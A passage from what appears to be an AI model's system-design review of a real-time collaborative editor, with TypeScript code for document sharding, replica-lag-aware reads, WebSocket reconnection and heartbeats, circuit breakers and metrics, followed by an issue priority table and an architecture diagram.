async recoverFromPostgres(documentId: string, fromRevision: number): Promise<DocumentOperation[]> {
const { rows } = await this.pool.query(`
SELECT * FROM document_operations
WHERE document_id = $1 AND revision > $2
ORDER BY revision ASC
`, [documentId, fromRevision]);
return rows.map(row => ({
id: row.id,
documentId: row.document_id,
userId: row.user_id,
revision: row.revision,
operation: JSON.parse(row.operation),
timestamp: JSON.parse(row.timestamp),
checksum: row.checksum
}));
}
}
The Problem: Large organizations (e.g., enterprise customers) create hot partitions:
Organization A (10 users): Partition 1 - light load
Organization B (10,000 users): Partition 2 - overwhelmed
Organization C (50 users): Partition 3 - light load
Solution: Document-Level Sharding with Consistent Hashing
class DocumentShardRouter {
private shards: ShardInfo[];
private hashRing: ConsistentHashRing;
constructor(shards: ShardInfo[]) {
this.shards = shards;
this.hashRing = new ConsistentHashRing(
shards.map(s => s.id),
100 // Virtual nodes per shard
);
}
getShardForDocument(documentId: string): ShardInfo {
const shardId = this.hashRing.getNode(documentId);
return this.shards.find(s => s.id === shardId)!;
}
// Rebalance when adding/removing shards
async addShard(newShard: ShardInfo): Promise<void> {
this.shards.push(newShard);
this.hashRing.addNode(newShard.id);
// Migrate affected documents
await this.migrateDocuments(newShard);
}
private async migrateDocuments(targetShard: ShardInfo): Promise<void> {
// Find documents that should now be on the new shard
for (const shard of this.shards) {
if (shard.id === targetShard.id) continue;
const documents = await this.getDocumentsOnShard(shard);
for (const doc of documents) {
const correctShard = this.getShardForDocument(doc.id);
if (correctShard.id === targetShard.id) {
await this.migrateDocument(doc.id, shard, targetShard);
}
}
}
}
}
// Shard-aware connection pool
class ShardedConnectionPool {
private pools: Map<string, Pool> = new Map();
private router: DocumentShardRouter;
async query(documentId: string, sql: string, params: any[]): Promise<QueryResult> {
const shard = this.router.getShardForDocument(documentId);
const pool = this.pools.get(shard.id);
if (!pool) {
throw new Error(`No pool for shard ${shard.id}`);
}
return pool.query(sql, params);
}
// Cross-shard queries (avoid when possible)
async queryAll(sql: string, params: any[]): Promise<QueryResult[]> {
const results = await Promise.all(
Array.from(this.pools.values()).map(pool => pool.query(sql, params))
);
return results;
}
}
Alternative: Vitess or Citus for Automatic Sharding
-- Citus distributed table
SELECT create_distributed_table('document_operations', 'document_id');
SELECT create_distributed_table('documents', 'id');
-- Queries automatically route to correct shard
SELECT * FROM documents WHERE id = 'doc-123'; -- Routes to one shard
SELECT * FROM documents WHERE organization_id = 'org-456'; -- Fan-out query
The Problem: Read replicas can be seconds behind the primary, causing users to see stale data:
10:00:00.000 - Alice saves document (writes to primary)
10:00:00.500 - Alice refreshes page (reads from replica)
Replica is 1 second behind - Alice sees old version!
"Where did my changes go?!"
Solution: Read-Your-Writes Consistency
class ConsistentReadService {
private primaryPool: Pool;
private replicaPool: Pool;
private redis: Redis;
async read(
userId: string,
documentId: string,
query: string,
params: any[]
): Promise<QueryResult> {
// Check if user recently wrote to this document
const lastWriteTime = await this.redis.get(`write:${userId}:${documentId}`);
if (lastWriteTime) {
const timeSinceWrite = Date.now() - parseInt(lastWriteTime);
// If write was recent, check replica lag
if (timeSinceWrite < 10000) { // Within 10 seconds
const replicaLag = await this.getReplicaLag();
if (replicaLag * 1000 > timeSinceWrite) {
// Replica hasn't caught up - read from primary
return this.primaryPool.query(query, params);
}
}
}
// Safe to read from replica
return this.replicaPool.query(query, params);
}
async write(
userId: string,
documentId: string,
query: string,
params: any[]
): Promise<QueryResult> {
const result = await this.primaryPool.query(query, params);
// Track write time for read-your-writes consistency
await this.redis.setex(
`write:${userId}:${documentId}`,
60, // Track for 60 seconds
Date.now().toString()
);
return result;
}
private async getReplicaLag(): Promise<number> {
const { rows } = await this.replicaPool.query(`
SELECT EXTRACT(EPOCH FROM (NOW() - pg_last_xact_replay_timestamp())) AS lag
`);
return rows[0]?.lag ?? 0;
}
}
// Alternative: LSN-based consistency
class LSNConsistentReadService {
async write(userId: string, query: string, params: any[]): Promise<{ result: QueryResult; lsn: string }> {
const result = await this.primaryPool.query(query, params);
// Get current WAL position
const { rows } = await this.primaryPool.query('SELECT pg_current_wal_lsn()::text AS lsn');
const lsn = rows[0].lsn;
// Store LSN for user's session
await this.redis.setex(`session:${userId}:lsn`, 300, lsn);
return { result, lsn };
}
async read(userId: string, query: string, params: any[]): Promise<QueryResult> {
const requiredLsn = await this.redis.get(`session:${userId}:lsn`);
if (requiredLsn) {
// Wait for replica to catch up (with timeout)
await this.waitForReplicaLsn(requiredLsn, 5000);
}
return this.replicaPool.query(query, params);
}
private async waitForReplicaLsn(targetLsn: string, timeoutMs: number): Promise<void> {
const start = Date.now();
while (Date.now() - start < timeoutMs) {
const { rows } = await this.replicaPool.query(`
SELECT pg_last_wal_replay_lsn() >= $1::pg_lsn AS caught_up
`, [targetLsn]);
if (rows[0].caught_up) return;
await new Promise(resolve => setTimeout(resolve, 50));
}
// Timeout - fall back to primary
throw new Error('Replica lag timeout');
}
}
The Problem: WebSocket connections drop frequently (network changes, mobile sleep, etc.). Without proper reconnection, users lose real-time updates.
Solution: Robust Reconnection with Exponential Backoff
class ResilientWebSocket {
private ws: WebSocket | null = null;
private url: string;
private reconnectAttempts = 0;
private maxReconnectAttempts = 10;
private baseDelay = 1000;
private maxDelay = 30000;
private messageQueue: string[] = [];
private lastEventId: string | null = null;
constructor(url: string) {
this.url = url;
this.connect();
}
private connect(): void {
// Include last event ID for resumption
const connectUrl = this.lastEventId
? `${this.url}?lastEventId=${this.lastEventId}`
: this.url;
this.ws = new WebSocket(connectUrl);
this.ws.onopen = () => {
console.log('WebSocket connected');
this.reconnectAttempts = 0;
this.flushMessageQueue();
};
this.ws.onclose = (event) => {
if (event.code !== 1000) { // Not a clean close
this.scheduleReconnect();
}
};
this.ws.onerror = (error) => {
console.error('WebSocket error:', error);
};
this.ws.onmessage = (event) => {
const data = JSON.parse(event.data);
if (data.eventId) {
this.lastEventId = data.eventId;
}
this.handleMessage(data);
};
}
private scheduleReconnect(): void {
if (this.reconnectAttempts >= this.maxReconnectAttempts) {
console.error('Max reconnection attempts reached');
this.onMaxRetriesExceeded?.();
return;
}
const delay = Math.min(
this.baseDelay * Math.pow(2, this.reconnectAttempts) + Math.random() * 1000,
this.maxDelay
);
console.log(`Reconnecting in ${delay}ms (attempt ${this.reconnectAttempts + 1})`);
setTimeout(() => {
this.reconnectAttempts++;
this.connect();
}, delay);
}
send(message: string): void {
if (this.ws?.readyState === WebSocket.OPEN) {
this.ws.send(message);
} else {
// Queue message for when connection is restored
this.messageQueue.push(message);
}
}
private flushMessageQueue(): void {
while (this.messageQueue.length > 0 && this.ws?.readyState === WebSocket.OPEN) {
const message = this.messageQueue.shift()!;
this.ws.send(message);
}
}
// Callbacks
onMessage?: (data: any) => void;
onMaxRetriesExceeded?: () => void;
private handleMessage(data: any): void {
this.onMessage?.(data);
}
}
Server-Side: Event Resumption
class WebSocketServer {
private redis: Redis;
async handleConnection(ws: WebSocket, req: Request): Promise<void> {
const documentId = req.query.documentId as string;
const lastEventId = req.query.lastEventId as string | undefined;
// Send missed events if client is resuming
if (lastEventId) {
const missedEvents = await this.getMissedEvents(documentId, lastEventId);
for (const event of missedEvents) {
ws.send(JSON.stringify(event));
}
}
// Subscribe to new events
this.subscribeToDocument(documentId, ws);
}
private async getMissedEvents(documentId: string, lastEventId: string): Promise<any[]> {
// Use Redis Streams for event sourcing
const events = await this.redis.xrange(
`doc:${documentId}:events`,
lastEventId,
'+',
'COUNT', 1000
);
return events
.filter(([id]) => id !== lastEventId) // Exclude the last seen event
.map(([id, fields]) => ({
eventId: id,
...this.parseStreamFields(fields)
}));
}
}
The Problem: Silent connection failures (NAT timeout, proxy disconnect) aren't detected, leaving "zombie" connections.
Solution: Bidirectional Heartbeat
// Client-side
class HeartbeatWebSocket extends ResilientWebSocket {
private heartbeatInterval: NodeJS.Timeout | null = null;
private heartbeatTimeout: NodeJS.Timeout | null = null;
private readonly HEARTBEAT_INTERVAL = 30000; // 30 seconds
private readonly HEARTBEAT_TIMEOUT = 10000; // 10 seconds to respond
protected onOpen(): void {
super.onOpen();
this.startHeartbeat();
}
protected onClose(): void {
this.stopHeartbeat();
super.onClose();
}
private startHeartbeat(): void {
this.heartbeatInterval = setInterval(() => {
if (this.ws?.readyState === WebSocket.OPEN) {
this.ws.send(JSON.stringify({ type: 'ping', timestamp: Date.now() }));
this.heartbeatTimeout = setTimeout(() => {
console.log('Heartbeat timeout - closing connection');
this.ws?.close();
}, this.HEARTBEAT_TIMEOUT);
}
}, this.HEARTBEAT_INTERVAL);
}
private stopHeartbeat(): void {
if (this.heartbeatInterval) clearInterval(this.heartbeatInterval);
if (this.heartbeatTimeout) clearTimeout(this.heartbeatTimeout);
}
protected handleMessage(data: any): void {
if (data.type === 'pong') {
if (this.heartbeatTimeout) clearTimeout(this.heartbeatTimeout);
return;
}
super.handleMessage(data);
}
}
// Server-side
class WebSocketServerWithHeartbeat {
private readonly CLIENT_TIMEOUT = 60000; // 60 seconds without activity
handleConnection(ws: WebSocket): void {
let lastActivity = Date.now();
const checkTimeout = setInterval(() => {
if (Date.now() - lastActivity > this.CLIENT_TIMEOUT) {
console.log('Client timeout - closing connection');
ws.close(4000, 'Timeout');
clearInterval(checkTimeout);
}
}, 10000);
ws.on('message', (message) => {
lastActivity = Date.now();
const data = JSON.parse(message.toString());
if (data.type === 'ping') {
ws.send(JSON.stringify({ type: 'pong', timestamp: Date.now() }));
return;
}
this.handleMessage(ws, data);
});
ws.on('close', () => {
clearInterval(checkTimeout);
});
}
}
The Problem: When components fail, the entire system becomes unusable instead of degrading gracefully.
Solution: Circuit Breakers and Fallbacks
import CircuitBreaker from 'opossum';
class ResilientDocumentService {
private dbBreaker: CircuitBreaker;
private redisBreaker: CircuitBreaker;
private localCache: LRUCache<string, Document>;
constructor() {
// Database circuit breaker
this.dbBreaker = new CircuitBreaker(this.queryDatabase.bind(this), {
timeout: 3000, // 3 second timeout
errorThresholdPercentage: 50, // Open after 50% failures
resetTimeout: 30000, // Try again after 30 seconds
volumeThreshold: 10 // Minimum requests before opening
});
this.dbBreaker.fallback(async (documentId: string) => {
// Try Redis cache
return this.getFromRedis(documentId);
});
this.dbBreaker.on('open', () => {
console.error('Database circuit breaker opened');
this.alertOps('Database circuit breaker opened');
});
// Redis circuit breaker
this.redisBreaker = new CircuitBreaker(this.queryRedis.bind(this), {
timeout: 1000,
errorThresholdPercentage: 50,
resetTimeout: 10000
});
this.redisBreaker.fallback(async (key: string) => {
// Fall back to local cache
return this.localCache.get(key);
});
}
async getDocument(documentId: string): Promise<Document | null> {
try {
// Try local cache first
const cached = this.localCache.get(documentId);
if (cached) return cached;
// Try Redis (through circuit breaker)
const redisDoc = await this.redisBreaker.fire(documentId);
if (redisDoc) {
this.localCache.set(documentId, redisDoc);
return redisDoc;
}
// Try database (through circuit breaker)
const dbDoc = await this.dbBreaker.fire(documentId);
if (dbDoc) {
this.localCache.set(documentId, dbDoc);
await this.cacheInRedis(documentId, dbDoc);
return dbDoc;
}
return null;
} catch (error) {
console.error('All fallbacks failed:', error);
throw new ServiceUnavailableError('Document service temporarily unavailable');
}
}
// Degraded mode: Allow viewing but not editing
async saveOperation(op: DocumentOperation): Promise<SaveResult> {
try {
await this.dbBreaker.fire(op);
return { success: true };
} catch (error) {
if (this.dbBreaker.opened) {
// Queue operation for later processing
await this.queueForRetry(op);
return {
success: false,
queued: true,
message: 'Your changes are saved locally and will sync when service is restored'
};
}
throw error;
}
}
}
The Problem: Without proper observability, you can't diagnose issues or understand system behavior.
Solution: Comprehensive Observability Stack
import { metrics, trace, context } from '@opentelemetry/api';
import { PrometheusExporter } from '@opentelemetry/exporter-prometheus';
class DocumentMetrics {
private meter = metrics.getMeter('document-service');
private tracer = trace.getTracer('document-service');
// Counters
private operationsTotal = this.meter.createCounter('document_operations_total', {
description: 'Total number of document operations'
});
private conflictsTotal = this.meter.createCounter('document_conflicts_total', {
description: 'Total number of operation conflicts'
});
// Histograms
private operationLatency = this.meter.createHistogram('document_operation_latency_ms', {
description: 'Latency of document operations in milliseconds'
});
private syncLatency = this.meter.createHistogram('document_sync_latency_ms', {
description: 'Time from operation submission to all clients receiving it'
});
// Gauges
private activeConnections = this.meter.createObservableGauge('websocket_connections_active', {
description: 'Number of active WebSocket connections'
});
private documentSize = this.meter.createHistogram('document_size_bytes', {
description: 'Size of documents in bytes'
});
// Instrument an operation
async trackOperation<T>(
operationType: string,
documentId: string,
fn: () => Promise<T>
): Promise<T> {
const span = this.tracer.startSpan(`document.${operationType}`, {
attributes: {
'document.id': documentId,
'operation.type': operationType
}
});
const startTime = Date.now();
try {
const result = await context.with(trace.setSpan(context.active(), span), fn);
this.operationsTotal.add(1, {
operation: operationType,
status: 'success'
});
return result;
} catch (error) {
span.recordException(error as Error);
this.operationsTotal.add(1, {
operation: operationType,
status: 'error',
error_type: (error as Error).name
});
throw error;
} finally {
const duration = Date.now() - startTime;
this.operationLatency.record(duration, {
operation: operationType
});
span.end();
}
}
recordConflict(documentId: string, conflictType: string): void {
this.conflictsTotal.add(1, {
document_id: documentId,
conflict_type: conflictType
});
}
recordSyncLatency(latencyMs: number): void {
this.syncLatency.record(latencyMs);
}
}
// Structured logging
import pino from 'pino';
const logger = pino({
level: process.env.LOG_LEVEL || 'info',
formatters: {
level: (label) => ({ level: label })
},
base: {
service: 'document-service',
version: process.env.APP_VERSION
}
});
// Usage
class DocumentService {
private metrics = new DocumentMetrics();
private logger = logger.child({ component: 'DocumentService' });
async applyOperation(op: DocumentOperation): Promise<void> {
return this.metrics.trackOperation('apply', op.documentId, async () => {
this.logger.info({
event: 'operation_received',
documentId: op.documentId,
userId: op.userId,
revision: op.revision
});
// ... apply operation
this.logger.info({
event: 'operation_applied',
documentId: op.documentId,
newRevision: op.revision
});
});
}
}
| Issue | Severity | Effort | Priority |
|---|---|---|---|
| Client clock timestamps | 🔴 Critical | Medium | P0 |
| Paragraph-level LWW | 🔴 Critical | High | P0 |
| Cross-server WebSocket isolation | 🔴 Critical | Medium | P0 |
| 30-second snapshot data loss | 🔴 Critical | Medium | P0 |
| JWT in localStorage | 🟠 High | Low | P1 |
| CDN caching API responses | 🟠 High | Low | P1 |
| Missing document authorization | 🟠 High | Medium | P1 |
| PostgreSQL as message bus | 🟠 High | High | P1 |
| No WebSocket reconnection | 🟡 Medium | Low | P2 |
| No heartbeat/keep-alive | 🟡 Medium | Low | P2 |
| Read replica lag | 🟡 Medium | Medium | P2 |
| Organization-based sharding | 🟡 Medium | High | P2 |
| HTML storage (XSS) | 🟡 Medium | Medium | P2 |
| Missing observability | 🟡 Medium | Medium | P2 |
| No circuit breakers | 🟢 Low | Medium | P3 |
┌─────────────────────────────────────────────────────────────────────────────┐
│ Load Balancer │
│ (Sticky sessions by document ID) │
└─────────────────────────────────────────────────────────────────────────────┘
│
┌─────────────────┼─────────────────┐
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ API Server │ │ API Server │ │ API Server │
│ + WebSocket │ │ + WebSocket │ │ + WebSocket │
│ + OT Engine │ │ + OT Engine │ │ + OT Engine │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
└─────────────────┼─────────────────┘
│
┌─────────────────┼─────────────────┐
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Redis │ │ Redis │ │ Redis │
│ (Primary) │ │ (Replica) │ │ (Replica) │
│ - Pub/Sub │ │ │ │ │
│ - Op Cache │ │ │ │ │
│ - Sessions │ │ │ │ │
└──────────────┘ └──────────────┘ └──────────────┘
│
┌─────────────────┼─────────────────┐
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ PostgreSQL │ │ PostgreSQL │ │ PostgreSQL │
│ (Primary) │ │ (Replica) │ │ (Replica) │
│ - Documents │ │ (Read-only) │ │ (Read-only) │
│ - Operations│ │ │ │ │
│ - Snapshots │ │ │ │ │
└──────────────┘ └──────────────┘ └──────────────┘
This architecture addresses all critical issues while maintaining scalability and reliability.
Turn this model response into notes, narration, or a short video
Partner link